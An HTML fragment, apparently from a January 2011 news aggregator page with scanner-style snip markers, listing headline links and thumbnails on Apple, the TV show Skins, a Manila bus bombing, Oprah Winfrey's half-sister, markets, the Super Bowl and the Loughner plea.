<h2 class="title"> <a target="_blank" class="usg-AFQjCNFD01jlTzuVK-p78scDRYNO2eREHw " href="http://www.computerworld.com/s/article/9205878/2011_Year_of_the_desktop_app_store_" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.itproportal.com/2011/01/25/apple-app-store-goes-twitter/" target="_blank" class="usg-AFQjCNFFkgai6RxcDNfWyhHhpN-QWkC5dw " id="MAA4AEgMUAFgAmoCdXM">Apple App Store Goes On Twitter</a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgMUAJgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVgc2xuik70cWhAMH-Br_p_sihpA " href="http://www.mercurynews.com/business/ci_17186613" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&amp;cid=RSSfeed_IWK_News" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/uH0w557Gx5vRRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA "> msnbc.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFctqmK23nef-iMoWXVheexj3Fc8Q " href="http://www.mtv.com/news/articles/1656569/skins-stars-despite-kissing-tony-tea-still-lesbian.jhtml" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html" target="_blank" class="usg-AFQjCNH8bRcCEH29oi-7_xE6pfdD2yNA3g " id="MAA4AEgNUAFgAmoCdXM">&#39;Skins&#39;&#39; Tea (Sofia Black-D&#39;Elia) tries to overcome superiority over her peers</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.tvfanatic.com/2011/01/skins-review-tea/" target="_blank" class="usg-AFQjCNGde28JTbZjALerAo_OgFwYxHt0hw " id="MAA4AEgNUAJgAmoCdXM">Skins Review: Hot Lesbian Sex!!!</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfWuNgYPg0ZILv5hSzruDwtuhpzQ " href="http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNENXxi-UPCdca1EUVCju-ionMEWqA " href="http://tunedin.blogs.time.com/2011/01/25/the-morning-after-second-skins/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGe7TwFsxpL5X7U8Mw3VwnLra2q2g " href="http://watching-tv.ew.com/2011/01/24/skins-mtv-child-porn-jersey-shore/" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFeivtzBnx1HNPVs32vSjfRu97pGA " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA " title="Reuters India"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/cVcigKnuY3OZyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA "> Reuters Ind... </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=eVzgsG-PBuQ">Video:&nbsp;
Manila Bus Blast Leaves 4 Dead
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70O1MV20110125" target="_blank" class="usg-AFQjCNG_i6tDzBrxVpfguEeyJgBOYOX5Rg " id="MAA4AEgOUAFgAmoCdXM">Four dead in Manila bus bombing; investigation starts</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGaMMS9N7gYyG5t5xc-JnYXzRSF5w " href="http://www.npr.org/templates/story/story.php?storyId=133201226" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH9sGGWcAU2di9fzAAd-AOuP_4BpA " href="http://edition.cnn.com/2011/WORLD/asiapcf/01/25/philippines.bus.bomb/" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGOxAIjsdF8I5HXIRAIm5yNB8OCHQ " href="http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw " title="ABC News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/Z8UKO03JuMuYfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE7Fz5EwbxKGgzuAdjAkWwQIRJyKA " href="http://abcnews.go.com/Health/MindMoodNews/family-secrets-emotions-oprah-winfreys-revelation/story?id=12751870" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=ashZeYCLLKw">Video:&nbsp;
Oprah Finds Sister She Didn't Know She Had
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html" target="_blank" class="usg-AFQjCNHc8PRjJtA_r-6sLAipgOQmTkUeqw " id="MAA4AEgPUAFgAmoCdXM">Revelation of a half sister means an Oprah Winfrey family windfall</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHK46gYZdjQAXcbhaRli6LniG1SMQ " href="http://www.popfi.com/2011/01/25/oprahs-half-sister/" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpy8YlETU0ho_a7R_kPPB1fFhD1w " href="http://www.associatedcontent.com/article/6262014/oprah_winfrey_reunites_with_halfsister.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHsWooEP8CzeSP994Mtc3uxXFR_Bg " href="http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbHZ1QnEfcooEG3W8c8YZWD5vHHA " href="http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/wd2GJA09xMOOhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGh3ZjVoZGGhNMSHQsQxFWCIjQhDQ " href="http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/cocoa-fluctuates-as-ivory-coast-permits-some-bean-exports-sugar-declines.html" target="_blank" class="usg-AFQjCNE3qOBHQefJ2oBBLri58rbv9LJZtQ " id="MAA4AEgQUAFgAmoCdXM">Cocoa Fluctuates as Ivory Coast Permits Some Bean Exports; Sugar Declines</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGurqi_xasll9AJrXYC-1MiIemnNw " href="http://allafrica.com/stories/201101250644.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFY83V_AAfjDtJZVh0a4dwPgg4bw " href="http://www.reuters.com/article/idUSLDE70O14P20110125" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEBPU1Hcc-7k2RJJ76c88A5ASiKQw " href="http://af.reuters.com/article/investingNews/idAFJOE70O0EI20110125" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxQjL0Xe0xQJO9mKL3moYUdYmacQ " href="http://www.businessweek.com/news/2011-01-25/ivory-coast-s-ouattara-to-let-already-taxed-cocoa-to-be-shipped.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/YNo9KTUQtZTd9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFARx2P5zNvWZAz4sw2rt6U-UJwnA " href="http://www.allheadlinenews.com/briefs/articles/90032000?McDonald%26%23146%3Bs%20hints%20of%20price%20increase%20this%20year" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2416456020110124" target="_blank" class="usg-AFQjCNHjS3vYRRTlA-qvmPbstYY5-pM5DA " id="MAA4AEgRUAFgAmoCdXM">CORRECTED - UPDATE 2-McDonald&#39;s December sales disappoint; shares fall</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp" target="_blank" class="usg-AFQjCNEFCjzArnAipLxhgmi02CYhoR5miQ " id="MAA4AEgRUAJgAmoCdXM">Profit Edges Up at McDonald&#39;s, and Its Prices Will, Too</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFPrMDRNs8vkUnzFLUmjvLLidTZvA " href="http://online.wsj.com/article/SB10001424052748703555804576101771527131098.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfaDQUuI0976Cj63ad4cyPLpG_QQ " href="http://www.latimes.com/business/la-fi-0125-mcdonalds-20110124,0,874800.story" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7_Ws5DYBS0zeqHu0Rr4Yi5dO9oQ " href="http://www.marketwatch.com/story/mcdonalds-quarterly-profit-rises-2-2011-01-24?reflink=MW_news_stmp" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw " title="Boston Globe"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/qdO1rwvn09fEzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw "> Boston Glob... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHFh2GvvfmSVeefor8vLmuG3eJekw " href="http://travel.usatoday.com/flights/post/2011/01/delta-adds-wisconsin-dfw-flights-for-super-bowl/140051/1" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bizjournals.com/milwaukee/morning_roundup/2011/01/pack-gear-flies-as-dallas-flights-added.html" target="_blank" class="usg-AFQjCNFYl1bXTkZw_8xO3jwfmtUTgUPDMQ " id="MAA4AEgSUAFgAmoCdXM">Pack gear flies as Dallas flights added</a>
...[SNIP]...
<div class="aa-inner"><a href="http://lifeinc.todayshow.com/_news/2011/01/25/5908197-nfl-playoffs-flash-strong-buy-signal-for-stocks" target="_blank" class="usg-AFQjCNEpW0cGFBYoPK2aOSpry6U8jDARlA " id="MAA4AEgSUAJgAmoCdXM">NFL playoffs flash strong &#39;buy&#39; signal for stocks</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4oXCRQbj0GVx75XGEVBl7lgmJXw " href="http://bleacherreport.com/articles/584247-super-bowl-2011-everything-you-need-to-know-for-a-great-super-bowl-sunday/entry/44040-super-bowl-2011-should-you-pay-the-price-and-travel-to-dallas" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqG8mxPehu8mJyffEBfUtvwnUaBQ " href="http://www.dallasnews.com/incoming/20110124-cowboys-owner-jerry-jones-excited-about-super-bowl-matchup.ece" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhmIjnxiBjSPpTi6HciKDhhlJklQ " href="http://denver.sbnation.com/denver-broncos/2011/1/25/1954559/super-bowl-history-green-bay-packers-last-appearance-denver-broncos" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHeapDjp_UwWVx3OwaDOPDuOLCpZg " href="http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw " title="Washington Post"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-WrEkuynH2TOuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHVqavhl78e1BGRhCFhDpMYchxwag " href="http://www.reuters.com/article/idUSN2525409520110125" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/dupont-sees-year-eps-3-45-3-75-saw-3-30-3-60-est-3-51.html" target="_blank" class="usg-AFQjCNExpii4NsuowkXIJMgslKUqBurpMA " id="MAA4AEgTUAFgAmoCdXM">DuPont Profit Drops Less Than Expected; 2011 Forecast Raised</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stock-futures-slip-amid-earnings-deluge-2011-01-25?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGcimztEVak-LjOqD7putfXoCzopQ " id="MAA4AEgTUAJgAmoCdXM">U.S. stock futures slip amid earnings deluge</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEi4oP6I32sCYAUCVJ2U9leGd96ag " href="http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&amp;SM=1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3rk8geCFqCOxy1HwxiPyW1MZdvA " href="http://blogs.wsj.com/marketbeat/2011/01/25/dupont-results-top-views-as-revenue-jumps/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHsmAqMdXC30FFaEw2W0lsv51aXOA " href="http://online.wsj.com/article/SB20001424052748703555804576102350092762930.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=AMxZxlkv-6o">Video:&nbsp;
Loughner Pleads Not Guilty in AZ Shooting
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://thecrimereport.org/2011/01/25/tucson-shooting-turning-point-in-death-penalty-debate/" target="_blank" class="usg-AFQjCNEgLCP1DEJ1f5ynlwK35JzR9GyByQ " id="MAA4AEgUUAFgAmoCdXM">Tucson Shooting: Turning Point In Death Penalty Debate?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzje_hMOUVpDUGpEX9sojDHX2M6w " href="http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty" id="MAA4AEgUUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIeq_Ns7Eg3Q1K7muYce5YVqST7Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGclM7GNS2RlRwDlY-I5Sh_tvXrlA " href="http://www.latimes.com/news/nationworld/nation/la-na-jared-loughner-20110125,0,2181209.story" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg " title="Portfolio.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/9nA0qAvPpJ5tCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg "> Portfolio.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF2jLGtCargCIeSkIo7qnfEjTTITg " href="http://www.marketwatch.com/story/us-stock-futures-hold-losses-after-housing-data-2011-01-25" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704698004576103613884707694.html" target="_blank" class="usg-AFQjCNH63dxEzu3MUjCj-H7fBq6jy9-OXg " id="MAA4AEgVUAFgAmoCdXM">Futures Slip On Earnings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.foxnews.com/us/2011/01/25/earnings-decide-dow-breaks/" target="_blank" class="usg-AFQjCNEBWRfEEp_6PdxYPJ5HwDtXamG8ZQ " id="MAA4AEgVUAJgAmoCdXM">Earnings will decide if Dow breaks 12000</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEcBCxBebysAaamuuqoGdU6r2WTlQ " href="http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQ6-PRUCNN72J9NA3j8YhrRK9cag " href="http://money.cnn.com/2011/01/25/markets/premarkets/" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF1V9J-cnX-p6mS5xywLk2umDsG7w " href="http://www.foxbusiness.com/markets/2011/01/24/futures-hint-mini-pullback/" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHn26B9FGrLg4s4yok5aUh5NlOiQg " href="http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/VCZGlRd0xpHD1M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw " href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=d9eba8e277eacecc0db34acc6c16eff7" target="_blank" class="usg-AFQjCNErGJpmQblsRYr7n745_8XBgL4g9Q " id="MAA4AEgWUAFgAmoCdXM">Director of Policy on Climate Will Leave, Her Goal Unmet</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.upi.com/Top_News/US/2011/01/25/Browner-to-leave-Obama-administration/UPI-70761295960281/" target="_blank" class="usg-AFQjCNHSAP4FBvNGOu-kzUSh5JphXjfdqg " id="MAA4AEgWUAJgAmoCdXM">Browner to leave Obama administration</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHIbneIrzYccM4uVpuofL27tgDEpg " href="http://www.reuters.com/article/idUSTRE70O0CN20110125?feedType=RSS&amp;feedName=topNews" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH78KPkRMzCcmRj4CtQ-YF0ldcHWw " href="http://online.wsj.com/article/SB10001424052748703555804576102810159169324.html" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbw1RQqcrXAGdpgqor3K0S8MDI7w " href="http://www.cnn.com/2011/POLITICS/01/24/obama.browner/" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGPzQOAl5Cv_02XyR4hgK9rYzyHHA " href="http://www.foxnews.com/world/2011/01/25/medvedev-says-security-bombed-airport-poor/" id="8818998889059102899"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEorucr3owb2THD4rNv5uR-V_q9yg " href="http://www.foxnews.com/us/2011/01/24/authorities-fear-cops-targeted-officers-shot-hours/?test=latestnews" id="-2859349458615803843"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" id="8224434751009200465"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8fU_m8FGFR4iKSXsJpk066N5qag " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/southbound_bw_parkway_blocked.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFC1EBvU7F5yxK5gU4tz5-ZypPThg " href="http://voices.washingtonpost.com/capitalsinsider/braden-holtby/another-strong-performance-by.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGIrAh-rw28mhCKWop2qRMpETy2Ow " href="http://www.politico.com/news/stories/0111/48087.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEUzV7_ZmIL7u4HIu96A-yjfDW-Hw " href="http://www.latimes.com/news/nationworld/nation/la-na-tombstone-20110123,0,7161951.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH7t8T2ZuGQS4OfN9KxLM60oQv9Xw " href="http://www.foxbusiness.com/markets/2011/01/19/ski-resorts-reap-profits-unlikely-sources/" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHWI6XCGjzDiO52UVI_sjvLng7rZg " href="http://www.cnn.com/2011/CRIME/01/25/police.officers.shot/" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUCjFx0FGX7-2UQuwKW0tsjdNQ4Q " href="http://www.usatoday.com/travel/destinations/2011-01-20-dominican-republic-cheap-resort_N.htm" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFDSngTqWuarCK7zDSbK6E0DNrb1Q " href="http://tech.fortune.cnn.com/2011/01/25/today-in-tech-ipad-2-camera-nycs-new-digital-officer/?section=magazines_fortune" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHhWLxBM_njab00Iw569pvgKUJAJw " href="http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFNJ-0kb1mKjqFEMLNmp3UsDAHMQg " href="http://www.huffingtonpost.com/2011/01/21/glenn-beck-target-frances_n_812268.html" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
